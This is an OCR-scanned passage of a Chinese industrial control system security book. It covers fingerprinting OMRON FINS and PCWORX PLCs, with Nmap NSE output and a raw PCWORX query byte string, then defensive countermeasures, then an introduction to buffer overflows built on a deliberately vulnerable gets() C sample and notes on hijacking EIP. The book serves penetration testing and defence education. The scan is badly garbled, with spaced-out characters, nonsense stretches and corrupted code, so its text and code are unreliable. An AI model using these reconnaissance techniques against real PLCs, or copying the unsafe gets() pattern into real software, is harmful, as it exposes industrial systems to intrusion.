Pro 软 件 不 同 ，PCWORX 和 OMRON FINS 协 议 均 未 使 用 Modbus 协 议 进 行 通信 ， 而 是 利用 了 其 他 的 端口 和 协议 。 在 研究 厂商 的 专 有 协议 时 ， 要 想 详细 地 了 解 协议 
中 的 信息 ， 捕 获 协议 数据 包 是 一 种 非常 重要 的 方法 。 


5.6.1 OMRON FINS 协 议和 鉴别 攻击 


we tr lE : 


工厂 接口 网 络 服务 (Factory Interface Network Service, FINS) 是 一 套用 于 计算 机 与 PLC 在 不 同 介质 上 进行 通信 的 协议 ， 这 些 介质 包括 以 太 网 。FINS 标 准 
是 公开 发 布 的 标准 ， 可 以 在 网 上 很 多 地 方 找 到 。Wireshark 也 有 相应 的 FINS 协 议 解 析 模 块 ， 能 够 对 UDP 版 本 的 FINS 协 议 进行 解析 。Omron FINS 协 议 的 数据 包 结 


构 如 图 5-19 所 示 。 
信息 ox00 网 关 目标 目的 源 网 命令 码 
控制 域 允许 数目 | 网 络 地 址 natin 单元 号 | 络 地 址 标识 符 


图 5-19 OMRON FINS 协 议 数 据 包 结构 示意 图 


FINS 协 议 在 部 分 设备 中 既 可 以 采用 UDP 也 可 以 采用 TCP 方 式 工作 。 其 UDP 版 本 和 TCP 版 本 略 有 不 同 。TCP 版 本 的 FINS 协 议 要 求 必须 有 地 址 字段 ， 该 字段 值 可 
以 从 通信 过 程 中 对 初始 通信 数据 包 的 响应 信息 中 解析 出 来 。 要 想 弄 明白 这 个 问题 ， 需 要 访问 PLC 然 后 采用 多 个 脚本 对 通信 过 程 进行 测试 并 分 析 ， 进 而 残 可 以 确定 
有 哪些 字段 改变 了 ， 哪 些 字段 没有 改变 。 一 旦 了 解 了 这 些 内 容 ， 融 可 以 构造 数据 包 针对 设备 开展 侦察 与 攻击 。 


利用 Wireshark Wiki 页 面 (https://wiki.wireshark.org/OMRON-FINS) 中 提供 的 针对 OMRON FINS 协 议 的 样本 数据 包 ， 可 以 确定 UDP 版 本 FINS 协 议 的 数 
据 包 的 基本 通信 结构 。 该 协议 支持 读 取 与 写 入 、 终 止 和 启动 CPU 运行 ， 以 及 很 多 其 他 帮助 攻击 者 收集 PLC 信 息 的 功能 。Nmap NSE 也 友 布 了 一 个 脚本 
(https://nmap.org/nsedoc/scripts/omron-info.html) 用 于 识别 Omron 可 编程 序 控制 器 的 信息 ， 包 括 控制 器 型 号 、 控 制 器 和 版本、 程序 区 大 小 ， 以 及 其 他 关于 
PLC 的 信息 ， 如 下 图 所 示 。 如 果 使 用 UDP 的 -sU 选 项 调用 脚本 ， 那 么 Nmap NSE 脚 本 将 通过 TCP 和 UDP 两 种 方式 进行 查询 ， 查 询 得 到 的 信息 也 相同 。 


PORT STATE SERVICE PORT STATE SERVICE 


9600/udp open fins 9600/tcp open fins 
| omron-info: | omron-info: 
Controller Model: CJ2M-CPU33 02.00 Controller Model: CJ2M-CPU33 02.00 


Controller Version: 02.00 
For System Use: 


| 

| Controller Version: 02.00 | 

| For System Use: | 

| Program Area Size: 40 | Program Area Size: 40 
| IOM size: 23 | IOM size: 23 

| No. DM Words: 32768 | No. DM Words: 32768 
| Timer/Counter: 8 | Timer/Counter: 8 

| Expansion DM Size: 1 | Expansion DM Size: 1 

| No. of steps/transitions: © | No. of steps/transitions: © 

| Kind of Memory Card: No Memory Card | Kind of Memory Card: No Memory Card 
| Memory Card Size: © | Memory Card Size: 0© 


5.6.2 ”PCWORX 协 议 签 别 攻击 


Wi tT JE : 


JX Bit HERR : 


PCWORX 协 议 是 Phoenix Contact 公 司 的 专 有 协议 。 不 同 于 很 多 其 他 协议 ， 该 协议 没有 Wireshark 解 析 模 块 帮助 确定 其 协议 结构 。 因 此 ， 要 想 从 设备 中 收集 
信息 并 确定 其 可 能 的 协议 帧 结构 ， 需 要 使 用 PLC 和 工程 软件 ， 其 中 工程 软件 可 以 从 网 上 免费 下 载 。 该 工程 软件 一 旦 连接 上 PLC， 融 建立 会 话 并 开始 通信 。 通 信 过 程 
的 初始 数据 包 中 主要 传输 关于 PLC 的 信息 ， 并 且 同 被 测试 的 PLC 类 型 进行 匹配 。 确 定 能 否 重 构 这 些 信息 的 一 个 冲 用 方法 ， 融 是 研究 生成 该 响应 的 查询 请 求 。 


已 经 传输 的 查询 信息 为 x\01\x06\x00\x0e\x00\x02\x00\x00\x00\x00\x00\x4a\x04\x00， 随 后 重新 发 送 该 查询 信息 来 确定 是 否 可 以 收集 到 相同 的 信息 。 但 
是 ， 简 单 的 应 答 并 不 会 得 到 相同 的 结果 。 通 过 在 打开 PCWORX 软 件 以 及 连接 PLC 的 过 程 中 对 数据 包 进 行 捕获 ， 从 而 确定 数据 包 中 的 部 分 信息 友 生 了 改变 。 进 一 步 
检查 友 现 ， 原 来 是 查询 信息 中 第 12 个 字 节 所 在 位 置 的 字段 值 友 生 了 变化 。 如 图 5-20 所 示 ， 在 图 中 数据 包 中 该 位 置 的 字 节 为 0x4a， 在 另 一 个 数据 包 中 则 变 成 了 
0x42。 这 是 在 客户 端 和 PLC 中 的 多 次 连接 中 唯一 一 个 上 友 生 变化 的 字段 值 。 再 回 到 通信 过 程 上 看 ， 我 们 发 现 这 个 信息 看 上 去 像 是 客户 端 和 远程 PLC 之 间 的 协商 信 
息 。 如 果 对 另 一 次 查询 过 程 的 数据 包 进 行 捕获 ， 然 后 定位 初始 查询 信息 中 的 第 12 个 字 节 位 置 ， 结 果 与 在 PCWORX 客 户 端 和 远程 PLC 之 间 的 所 捕获 到 数据 包 结果 显 
示 的 一 样 。 这 个 简单 的 实例 说 明了 由 于 多 个 客户 端 同 时 与 远程 PLC 进 行 通信 ， 所 以 需要 对 会 话 标 识 符 进行 协商 。 这 种 机 制 有 助 于 保持 会 话 分 离 。 
|> Transmission Control Protocol, Src Port: 1962 (1962), Dst Port: 63147 (63147), Seq: 39, Ack: 63, Len: 176 
v Data (176 bytes) 


Data: 810600b0020000010000000000020000004a000000060098... 
[Length: 176] 


-=p. m waaa OEN 
wii 8es8 8 -. 


% ....:. a 了 


re ee Ta ELG 17 


@ ETH 2 ie wae ae 
Danau nm EY 
Ascher See ee 
/10....1 1:00:01. 
i: re . LEE S S E me o 


02.2916 532.82.. 


图 5-20 ”PCWORX 协 议 流量 捕获 示例 


利用 这 一 技术 ， 在 Redpoint 项 目 中 ，Digital Bond 公 司 发 布 了 一 个 Nmap NSE 脚 本 (https://github.com/digitalbond/Redpoint/blob/master/pcworx- 
info.nse) 用 以 收集 PCWORX 软 件 和 PLC 建 立 初始 会 话 过 程 中 的 信息 。 如 下 图 所 示 ， 这 些 信息 包括 了 PLC 的 类 型 、 型 号 和 运行 在 PLC 上 的 相关 固件 信息 。 总 的 来 
说 ， 需 要 友 送 两 个 数据 包 到 远程 PLC 上 ， 一 个 用 于 设置 会 话 标 识 符 ， 另 一 个 则 用 于 查询 PLC 信 息 。 


PORT STATE SERVICE 
1962/tcp open pcworx 
| pcworx-info: 

| PLC Type: ILC 170 ETH 2TX 
| Model Number: 2916532 

| Firmware Version: 3.71 

| Firmware Date: 11/17/10 

| Firmware Time: 11:00:01 


5.7 协议 攻击 的 对 抗 指 施 
我 们 在 这 一 节 中 把 针对 本 章 中 各 个 实例 的 对 抗 措施 再 巩固 一 下 。 但 遗憾 的 是 ， 在 所 有 这 些 攻击 情景 中 ， 只 有 一 小 部 分 安全 问题 能 够 得 以 缓解 。 
5.7.1 更 新 固件 


第 一 项 也 是 最 重要 的 一 项 对 抗 措 施 就 是 更 新 固件 。 但 是 在 生产 环境 中 ， 这 一 点 说 起 来 容易 做 起 来 难 ， 尽 管 如 此 ， 更 新 固件 始终 都 是 推荐 程度 较 高 的 对 抗 措 
施 。 

如 果 PLC 能 够 始终 跟 上 当前 固件 版 本 的 更 新 ， 那 么 依赖 于 诸如 任意 代码 执行 (如 缓冲 区 溢出 ) 等 技术 的 攻击 束 很 难 开展 。 对 于 利用 现 有 Metasploit 模 块 针对 
已 知 漏洞 友 起 的 攻击 更 是 如 此 。 其 他 的 一 些 漏洞 类 型 或 者 攻击 类 型 ， 比 如 拒绝 服务 攻击 和 Web 接 口 问 题 通 囊 也 可 以 借助 固件 更 新 来 加 以 纠正 。 


然而 ， 更 新 固件 也 并 非 万 全 之 策 ， 因 为 代码 中 始终 会 有 未 被 发 现 的 漏洞 ( 换 句 话说 也 丈 是 0-day 汤 洞 ) 。 但 是 ， 更 新 固件 有 助 于 减少 可 能 存在 的 0-day 漏 洞 数 
量 。 以 模糊 测试 为 例 ， 将 模糊 测试 结果 提交 给 ICS-CERT 和 三 商 之 后 ， 某 些 情况 下 ， 广 商 就 会 友 布 修复 补丁 用 来 对 输入 进行 验证 以 阻止 针对 新 发 现 的 漏洞 开展 漏洞 
利用 攻击 。 对 于 大 部 分 设备 来 说 ， 如 果 软 硬件 当前 的 固件 能 够 及 时 更 新 ， 那 么 就 会 将 其 暴露 在 漏洞 利用 攻击 面前 的 时 间 压 缩 到 最 短 。 因 此 ， 忆 是 选择 主动 对 程序 
打 补 丁 的 三 商 ， 有 利于 缩短 系统 暴露 在 新 老 漏洞 面前 的 时 间 ， 从 而 降低 风险 。 


5.7.2 ” 强 网 络 隔离 和 网 络 安全 


除了 给 固件 打 补 丁 之 外 ， 或 者 在 某 些 无 法 升级 固件 的 情况 下 ， 还 有 一 种 强 网 络 隔离 (Strong Network Segmentation) 的 设计 方式 ， 可 以 限制 授权 用 户 的 数 
量 并 且 防 御 本 章 中 讨论 到 的 多 数 攻 击 ， 例 如 中 间 人 攻击 、 查 询 请 求 、 信 息 泄露 、 模 糊 测试 和 基于 Metasploit 的 攻击 等 。 此 外 ， 使 用 其 他 常用 的 网 络 安全 防护 手 
段 ， 例 如 关闭 不 必要 的 端口 和 采用 网 络 访问 控制 系统 (Network Access Control systems, NAC) ， 也 能 防止 未 授权 系统 连接 到 网 络 。 


需要 注意 的 是 ， 由 于 某 些 协 议 如 OPC， 或 者 某 些 专 有 功能 码 如 功能 码 90， 均 需要 穿越 防火 墙 ， 因 此 采用 强 网 络 隔离 的 对 抗 措施 只 能 够 防止 最 初级 的 攻击 者 利 
用 跳板 进入 网 络 并 查找 可 以 使 用 这 些 协议 与 远程 设备 通信 的 主机 。 这 就 是 为 什么 使 用 分 层 防 御 手 段 总 是 最 佳 的 做 法 ， 分 层 防御 中 包括 了 网 络 监控 和 入 侵 检 测 系统 
(Intrusion Detection Systems, IDS) 。 当 监控 网 络 流量 时 ， 需 要 记 住 的 是 某 些 协 议 既 可 以 用 TCP 方 式 也 可 以 用 UDP 方式 进行 通信 。 同 样 推荐 使 用 标准 的 入 侵 
检测 系统 而 不 是 入 侵 防 御 系 统 (Intrusion Prevention Systems, IPS) 。 这 是 因为 入 侵 防御 系统 会 将 其 认为 威胁 流量 并 主动 拦截 ; 但 是 ， 误 报 所 导致 的 错误 拦截 
则 可 能 阻塞 过 程 网 络 (process network) 中 的 重要 流量 。 


5.7.3 “口令 暴力 攻击 的 对 抗 措施 


无 论 是 口令 的 离线 暴力 破解 攻击 ， 还 是 从 项 目 文件 中 提取 口令 进行 攻击 ， 要 求 攻击 者 要 么 能 够 进入 网 络 内 部 嗅 探 网 络 流量 ， 要 么 拥有 项 目 文件 的 访问 权限 。 


在 阻止 ARP 欺 骗 或 者 阻止 利用 其 他 方式 获取 网 络 嗅 探 能 力 时 ， 采 用 标准 网 络 安 全 措施 可 以 阻止 离线 暴力 破解 攻击 。 通 过 项 目 文 件 的 良好 管控 则 可 以 阻止 攻击 者 获 
取 对 文件 的 访问 权限 ， 以 免 从 文件 中 提取 口令 。 因 此 ， 这 些 文件 应 作为 敏感 信息 处 理 进而 保护 起 来 。 


5.8 AER 


大 多 数 工 业 协 议 在 设计 时 都 没有 考虑 到 安全 性 ， 因 此 与 生 俱 来 地 融 存 在 安全 隐患 。 理 解 这 些 安全 缺陷 并 了 解 如 何 加 以 利用 友 起 漏洞 利用 攻击 ， 对 于 工控 系统 
环境 中 的 渗透 测试 和 威胁 建 模 至 关 重 要 。 针 对 应 用 最 广泛 的 一 些 工 业 协议 ， 本 章 对 相关 的 基础 知识 进行 了 介绍 ， 来 帮助 理解 常用 的 攻击 手段 。 


5.9 ”延伸 阅读 


e Exploiting Siemens SIMATIC S7 PLCs, by Dillon Beresford, July 8, 2011 (https:// 
media.blackhat.com/bh-us-11/Beresford/BH_US11_Beresford_S7_PLCs_WP.pdf) 


第 6 草 ”工业 控制 系统 设备 与 应 用 攻击 


工业 控制 系统 通常 是 由 互联 设备 所 构成 的 大 型 、 复 杂 系 统 ， 这 些 设备 包括 类 似 于 人 机 界面 、PLC、 传 感 器 、 执 行 器 以 及 其 他 使 用 协商 好 的 协议 进行 相互 通信 
的 设备 。 所 有 交互 背后 的 驱动 力 都 是 软件 。 软 件 能 够 将 PLC 从 油井 和 泵 控制 器 变 成 水 净化 控制 器 ， 或 者 再 变 成 售 价 昂贵 的 压 纸 器 。 软 件 为 工控 系统 中 几乎 所 有 部 分 
的 运行 提供 支撑 。 部 分 工控 系统 安全 漏洞 都 归结 于 软件 问题 也 证 明了 软件 的 无 所 不 在 。 


2011 年 5 月 ， 美 国 国土 安全 部 (DHS) 发 布 了 一 份 名 为 《工业 控制 系统 通用 网 络 安全 漏洞 》 的 报告 (https://ics-cert.us- 
cert.gov/sites/default/files/recommended _practices/DHS Common Cybersecurity Vulnerabilities ICS 2010.pdf) 。 在 报告 中 ， 美 国 国土 安全 部 将 |CS- 
CERT 友 布 的 ， 以 及 在 国土 安全 部 国家 网 络 安全 局 的 控制 系统 安全 项 目 (Control Systems Security Program, CSSP) 中 挖掘 出 来 的 漏洞 分 为 了 五 大 类 ， 其 中 控 
制 系统 安全 项 目 主要 针对 工控 系统 开展 网 络 安全 评估 工作 。 在 提交 给 ICS-CERT 的 漏洞 以 及 在 控制 系统 安全 项 目 中 挖掘 出 的 漏洞 中 ， 超 过 40% 的 工控 系统 网 络 安全 
漏洞 都 被 归结 为 由 “不 正确 的 输入 验证 ”所 导致 。 不 正确 的 输入 验证 是 指 程序 员 假 设 了 对 数据 进行 了 某 种 限制 ， 但 是 事实 并 非 如 此 。 作 为 一 名 程序 员 ， 我 对 此 不 
禁 摇头 。 这 本 应 该 是 一 个 很 直 白 的 概念 : 在 使 用 数据 之 前 ， 确 保 所 使 用 的 数据 正 是 程序 员 所 期 望 的 数据 ! 但 令 人 遗憾 的 是 ， 在 现实 情况 中 ， 工 控 系 统 软 件 安全 的 
现状 距 期 望 值 还 有 很 长 的 距离 。 


更 令 人 忧心 的 是 ， 不 正确 的 输入 验证 并 不 是 导致 软件 出 错 的 唯一 方式 。 就 个 人 经 验 来 说 ， 工 控 系 统 应 用 程序 还 可 能 因为 安全 漏洞 出 错 。 所 以 ， 除 了 硬件 上 的 
漏洞 (如 心 片 设计 与 布局 等 ) 、 协 议 中 的 漏洞 、 系 统 配置 中 的 漏洞 之 外 ， 软 件 仍然 需要 为 工控 系统 安全 中 的 绝 大 部 分 漏洞 担负 主要 责任 。 


这 也 是 为 什么 将 安全 方面 的 考量 融入 进 软件 开发 过 程 如 此 重要 ， 特 别 是 当 编 写 的 软件 运行 在 世界 各 地 的 关键 基础 设施 上 的 时 候 。 但 是 ， 抛 开 那 些 “ 本 应 
该 ”、“ 本 能 够 ”、“ 本 可 以 ”不 谈 ， 事 实 上 在 工控 系统 应 用 程序 中 还 是 存在 大 量 漏洞 。 本 章 的 目的 不 在 于 挖掘 0-day 漏 洞 ， 而 是 指出 渗透 测试 过 程 中 可 以 利用 各 
种 弱点 来 获取 工业 控制 系统 的 访问 权限 。 这 些 弱 点 可 以 在 多 个 在 线 数据 库 中 检索 到 ， 例 如 ICS-CERT (https://ics-cert.us-cert.gov/) 、 国 家 漏洞 数据 库 
(National Vulnerability Database, https://nvd.nist.gov/) 。 但 是 ， 仅 仅 因 为 漏洞 得 以 公布 ， 并 不 意味 着 所 有 用 户 都 对 漏洞 进行 了 修复 。 下 面 让 我 们 来 了 解 一 
些 漏洞 及 攻击 类 型 ， 看 看 如 何 利用 这 一 点 。 


本 章 中 所 涉及 的 部 分 漏洞 和 攻击 实例 均 采 用 通用 方法 表示 ， 而 不 是 仅仅 专门 针对 工控 系统 的 实例 。 我 们 这 样 做 出 于 两 个 原因 。 第 一 ， 大 部 分 引用 的 ICS-CERT 
公告 并 不 公开 可 用 的 漏洞 利用 代码 。 我 们 也 不 打算 在 这 里 披露 “0-day ”漏洞 。 第 二 ， 在 工控 系统 设备 中 以 及 应 用 程序 中 的 代码 和 脆弱 性 与 其 他 软件 中 的 代码 和 脐 
弱 性 并 没有 什么 不 同 。 但 是 ， 对 于 每 种 漏洞 和 攻击 ， 我 们 还 是 提供 了 若干 条 相关 的 ICS-CERT 公 告 链 接 以 供 参 考 。 而 有 全， 我 们 还 提供 了 一 些 同 工控 系统 相关 的 环 
境 ， 和 帮助 读者 建立 联系 。 下 一 章 中 ， 我 们 会 把 这 些 内 容 同 一 个 针对 工控 系统 的 案例 研究 结合 起 来 ， 该 案例 研究 涉及 了 本 章 及 第 5 章 中 的 几 个 概念 。 


6.1 ”软件 的 漏洞 利用 


学 习 软 件 的 漏洞 利用 是 一 项 可 以 用 一 生来 做 的 工作 ， 更 别提 仅仅 只 用 书 中 的 一 个 章节 来 学 习 了 。 很 多 天 于 如 何 对 软件 进行 漏洞 利用 的 真知 灼 见 都 来 和 目 于 实 


践 。 每 个 软件 的 漏洞 利用 都 具有 其 自身 独 有 的 难点 与 挑战 。 但 是 本 章 并 不 打算 对 软件 安全 漏洞 进行 百科 全 书 式 的 讲解 。 本 章 主要 对 导致 安全 漏洞 的 常见 问题 、 漏 
洞 利用 的 方法 、 漏 洞 利 用 的 对 抗 措施 等 内 容 进 行 介绍 ， 同 时 也 提 到 了 现实 中 存在 这 些 漏洞 的 工控 系统 软件 和 应 用 实例 。 如 果 读 者 想 更 深入 地 学 习 软 件 的 漏洞 利 
用 ， 那 么 就 需要 查阅 更 加 专业 的 书籍 ， 例 如 Chris Anley、John Heasman, Felix Lindner 及 Gerardo Richarte 所 撰写 的 《The Shellcoder’ s Handbook: 
Discovering and Exploiting Security Holes》 一 书 。 话 虽 如 此 ， 本 章 的 技术 性 仍然 比较 强 。 虽 然 以 下 内 容 在 学 习 本 书 时 并 不 是 必需 的 ， 但 是 了 解 计算 机 架构 、 
C/C++ 开发 、 汇 编 语言 、 高 级 脚本 语言 ， 例 如 Python 以 及 (kA) Ruby 的 部 分 内 容 都 会 对 本 章 的 学 习 有 所 帮助 。 不 过 ， 本 章 所 提 及 的 实例 都 有 意 进 行 了 简化 ， 
只 介绍 其 中 的 天 键 内 容 ， 以 避免 对 编码 基础 薄弱 的 读者 市 来 困扰 。 


6.1.1 若干 基本 原理 


当 试 图 利用 软件 中 的 漏洞 对， 有 些 书籍 能 够 帮助 读者 了 解 程序 的 开发 过 程 。 有 本 比 本 书 略 厚 的 书 (.….. 咳 嗽 …..Stroustrup.….. 呢 哼 ) [来 帮助 人 们 来 学 习 这 
些 内 容 ， 我 仅仅 介绍 其 中 的 几 个 简单 要 点 。 从 较 高 的 层次 来 看 ， 程 序 束 是 一 组 对 数据 进行 操作 的 指令 序列 。 数 据 可 以 来 自 于 程序 自身 ， 或 者 ,实际 上 更 多 地 来 自 
于 用 户 的 输入 。 程 序 指令 (代码 ) 对 数据 进行 操作 ， 控 制程 序 的 流向 ， 并 同 软件 中 的 其 他 部 分 进行 通信 。 无 论 是 谁 控 制 了 数据 都 可 以 在 无 需 改变 程序 自身 的 指令 
或 者 代码 的 情况 下 (至 少 不 是 永久 更 改 ) 控制 程序 的 流向 、 操 作 的 结果 ， 以 及 同 其 他 软件 通信 的 内 容 。 因 此 ， 攻 击 的 天 键 之 一 就 是 指出 如 何 将 程序 中 的 某 一 数据 
设 定 为 想 要 的 值 。 接 下 来 ， 我 们 将 从 最 臭名 昭著 同时 也 是 最 基本 的 安全 漏洞 开始 。 


6.1.2 ”缓冲 区 涤 出 


1. 缓 冲 区 溢出 原理 


缓冲 区 溢出 漏洞 在 计算 机 安全 史 中 可 以 追溯 到 很 久之 前 。 早 在 1972 年 束 有 文献 提 及 缓冲 区 溢出 漏洞 
(http://csrc.nist.gov/publications/history/ande72.pdf, W611) 。1988 年 著名 的 Morris 蠕 虫 也 使 用 了 缓冲 区 溢出 漏洞 ， 这 是 引起 人 们 开始 思考 互联 网 安 
全 的 一 段 早 期 的 恶意 代码 ， 从 这 时 起 人 们 开始 认为 “ 呢 ， 也 许 我 们 不 应 该 完全 相信 互联 网 上 的 东西 ”。 


缓冲 区 就 是 内 存 中 用 于 填充 数据 的 一 块 连续 区 域 。 缓 冲 区 的 常见 用 法 是 存储 字符 串 ， 例 如 “Hello world! ”。 缓 冲 区 具有 固定 的 长 度 。 如 果 想 将 更 多 的 数据 
填充 到 缓冲 区 ， 那 么 缓冲 区 融会 “溢出 ”到 相 邻 的 内 存 区 域 。 是 的 ， 这 些 都 是 内 存 ， 但 是 特殊 的 内 存 区 域 可 能 存储 了 重要 的 内 容 ， 例 如 当前 函数 执行 完成 后 将 要 
执行 下 一 条 指令 的 内 存 地 址 。 


程序 经 过 编译 后 包含 不 同 的 段 (segment) ， 如 图 6-1 所 示 ， 其 中 很 多 段 中 都 包含 了 接收 外 部 系统 (文件 、 网 络 、 键 盘 等 ) 填充 数据 的 缓冲 区 。 一 些 比 较 有 趣 
的 段 是 栈 段 、 堆 段 、bss 段 〈 用 于 静态 初始 化 的 变量 ) 以 及 环境 段 。 每 个 段 的 作用 都 各 不 相同 ， 因 此 程序 和 操作 系统 对 不 同 段 的 处 理 方 式 也 不 一 样 。 有 大 量 文 献 介 
绍 如 何 向 这 些 段 中 注入 数据 以 控制 应 用 程序 的 后 续 执行 ， 因 此 这 种 攻击 形式 又 称 为 软件 攻击 (hacking software) 。 对 于 栈 来 说 ， 早 期 大 受 好 评 的 《Smashing 
the Stack for Fun and Profit) (http://phrack.org/issues/49/14.html) 是 一 篇 不 错 的 文章 。 对 于 堆 ，《Once Upon a Free) 

(http://phrack.org/issues/57/9.html) 和 《Advanced Doug Lea’ s Malloc Exploits) (http://phrack.org/issues/61/6.html) ) 都 是 非常 好 的 参考 文献 。 


操作 系统 内 核 〈 程 序 不 能 修改 ) 


=— 


MAES AWS) 


参考 文献 已 经 够 多 了 ， 下 面 让 我 们 来 看 些 实例 代码 。 一 段 基本 的 样本 代码 如 下 所 示 : 


finclude <stdio.h> 


int main() 


int x = UO; 
char buffer[6]; // Allocate 6 bytes of stack space 
gets (buffer); // Grab some input from the keyboard 
prance ("sa \n", x)? // Output the x variable, 

// which shouldn't have changed 


return 0; 


读者 可 以 使 用 偏爱 的 C 语 言 编译 器 编译 上 面 这 段 代码 。 如 果 没 有 ， 那 么 还 有 很 多 免费 的 编译 器 可 以 使 用 。 比 如 可 以 使 用 微软 公司 提供 的 Visual Sudio 社 区 版 
(https://www.visualstudio.com/en-us/downloads) 。 如 果 精 通 Linux 操 作 系 统 ， 那 么 GCC 编译 器 (https://gcc.gnu.org/) 就 是 事实 上 的 标准 编译 器 。 如 果 
怕 麻 烦 不 想 安 装 编 译 器 ， 但 同时 又 想 编写 一 些 代 码 实例 ， 那 么 可 以 使 用 http://www .tutorialspoint.com/compile_c_online.php 提 供 的 在 线 C 语 言 编译 器 。 


a) 
©... 

顺便 提 一 下 ， 我 希望 tutoftialspoint.com 真 正 知道 他 们 正在 做 什么 。 在 我 看 来 ， 编 译 并 运行 随便 什么 人 开发 的 代码 是 一 件 冒 险 的 事 。 顺 便 再 提 一 句 ， 如 果 曾 经 在 
生产 代码 中 看 到 过 gets O 函数 ， 请 立刻 删 挤 它 …… 因 为 gets O 不 对 字符 串 长 度 进行 检查 ， 此 时 缓冲 区 〔 以 及 缓冲 区 之 后 的 内 存 区 域 ) 就 像 娄 板 上 的 香 肉 ， 任 由 


键盘 前 的 用 户 宰割 。 


如 果 输 入 一 个 短 字 符 串 ,例如 “Hello”， 那 么 程序 应 该 输出 0。 而 如 果 输 入 更 长 的 字符 串 会 怎么 样 呢 ? 这 时 结果 将 取决 于 所 使 用 的 编译 器 和 编译 器 选项 ， 需 


要 对 不 同 长 度 的 字符 串 进 行 测试 才能 够 发 现 “ 中 奖 ” 行 为 。 下 面 是 使 用 之 前 提 到 的 在 线 编译 器 多 次 执行 代码 得 到 的 结 
sh-4.3S main 
65 
sh-4.3S5 main 
4276545 


sh-4.35 main 


1094795585 


sh-4.3S main 


NAA AAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAASA 
1094795585 
Segmentation fault (core dumped) 


REMAT, ASERREXSESAI3TSH. MOREA AR EE LNOARTTINE. COMA KEAASAAEASCH 4865 PAI Bla AZA 
十 进 制 表示 的 数值 65。 虽 然 整数 占用 的 空间 会 超过 一 个 字 节 ， 但 是 在 接 下 来 的 运行 中 ， 我 们 增加 了 更 多 的 字符 ， 导 致 整数 中 的 更 多 字 节 被 覆盖 。 然 后 ， 我 们 疯狂 
地 输入 一 堆 字 符 ， 来 看 看 会 发 生 什 么 。 程 序 衣 省 了 。 这 很 可 能 是 因为 main () 函数 的 返回 值 已 经 被 覆盖 。 下 面 是 栈 中 布局 的 一 个 简单 表示 : 


(Parameters... 
tO. 
...main...] 
EIP 
EBP 


x 


[Padding] | AAAAAA 


buffer | AAAAAA 


从 上 面 的 输入 示例 所 导致 的 执行 结果 可 以 看 出 ， 在 buffer 与 x 之 间 存 在 明显 的 填充 数据 。 而 且 x 在 填充 数据 之 上 。 然 后 友 生 了 一 些 诡异 的 事情 。 如 果 了 解 x86C 
编 语 言 ， 那 么 就 会 分 别 辨识 出 EBP 和 EIP 寄 存 器 ， 即 栈 基 址 寄存 器 (Extended Base Pointer) 与 当前 指令 寄存 器 (Extended Instruction Pointer) 。 在 栈 中 ， 它 
们 仅仅 只 是 数值 ， 但 是 它们 可 以 “弹出 ”到 EBP 与 EP 寄 存 器 中 。EBP 寄 仓 器 用 于 管理 程序 的 调用 栈 (这 超出 了 本 书 的 范畴 ) 。EIP 寄 存 器 用 于 存储 程序 下 一 条 执行 
指令 的 内 存 地 址 。 可 以 想象 到 ， 一 旦 获取 了 宵 存 器 EIP 的 控制 权 ， 攻 击 者 就 可 以 开始 庆祝 了 。 因 为 这 基本 上 意味 着 攻击 者 可 以 决定 程序 执行 的 流向 。 甚 至 还 可 以 发 
送 程序 到 某 块 缓冲 区 ， 而 攻击 者 可 以 对 这 块 缓冲 区 中 所 存储 的 信息 加 以 控制 。 该 缓冲 区 可 以 是 任意 的 缓冲 区 。 虽 然 实 际 上 ， 可 能 出 现 缓冲 区 溢出 攻击 的 缓冲 区 中 
通常 本 来 就 包含 攻击 者 想 要 执行 的 代码 。 


这 一 例子 中 用 到 的 输入 主要 来 自 键盘 输入 ， 但 是 对 于 该 类 型 的 所 有 漏洞 而 言情 况 并 不 一 定 都 是 如 此 。 任 意 来 源 的 输入 都 可 能 会 导致 漏洞 。 输 入 来 源 还 包括 网 
络 流量 、 文 件数 据 、 进 程 间 的 通信 数据 等 。 


需要 指出 的 是 ， 找 到 一 个 可 以 利用 的 地 址 ， 并 将 执行 流 重 定向 到 这 个 地 址 的 过 程 非常 微妙 复杂 。 通 常 需要 在 程序 中 或 者 相关 库 文件 .dl| 或 者 .so 文件 ) 中 找到 
则 令 ， 这 些 库 文件 在 编译 时 使 得 该 指令 忌 是 处 于 相同 地 址 。 攻 击 者 需要 查找 类 似 于 jmp ESP 的 指令 。ESP 即 栈 顶 指针 寄存 器 (Extended Stack Pointer) ， 用 来 存 


储 栈 顶 的 内 存 地 址 ， 这 也 正 是 缓冲 区 溢出 的 位 置 (或 者 附近 ) 。 通 过 令 程序 跳 转 到 指令 jmp ESP 所 在 的 位 置 ， 执 行 流 将 被 重 定向 到 栈 顶 缓冲 区 ， 这 也 是 攻击 者 放 
置 将 要 执行 的 指令 的 地 方 。 想 要 了 解 更 多 的 技巧 ， 可 以 阅读 Corelan Team 59 (Exploit Writing Tutorial》 系 列 文 章 
(https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) 。 


此 时 ， 对 缓冲 区 溢出 攻击 有 着 丰富 经 验 的 读者 可 能 会 抗议 ，“ 的 确 ， 现 在 组 ;中 区 溢出 不 再 像 以 前 那样 了 。” 这 人 句 话 在 大 多 数 场合 下 都 是 没 错 的。 现代 系统 以 
及 编译 器 所 具有 的 多 种 酷 炫 特性 使 “smashing the stack” 攻击 比 我 们 在 这 里 介绍 的 情况 要 困难 得 多 。 安 全 研究 员 们 采取 stack cookie、 数 据 执行 保护 (Data 
Execution Prevention, DEP) 、 地 址 空间 布局 随机 化 (Address Space Layout Randomization, ASLR) 等 多 种 应 对 方法 ， 来 对 抗 各 种 形式 的 缓冲 区 溢出 漏 
洞 。 对 于 有 兴趣 融 此 进行 深入 研究 的 朋友 们 ， 建 议 阅读 Corelan Team#SAY (Exploit Writing Tutorial》 系 列 文 章 的 第 6 部 分 来 了 解 对 栈 保护 机 制 的 规避 
(https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/) 。 


但 令 人 忧心 的 是 ， 很 多 工控 系统 软件 并 未 使 用 配 保 护 机 制 。 因 为 很 多 技术 是 近 些 年 才 提出 的 ， 可 工控 系统 的 安全 性 往往 落后 于 安全 前 沿 .…… 数 十 年 。 学 习 规 避 
技术 当然 是 一 种 有 益 的 练习 ， 但 如 果 目 标 是 工控 系统 应 用 ， 则 可 能 完全 用 不 上 这 些 技术 ， 很 遗憾 。 


2. 同 工控 系统 的 关联 


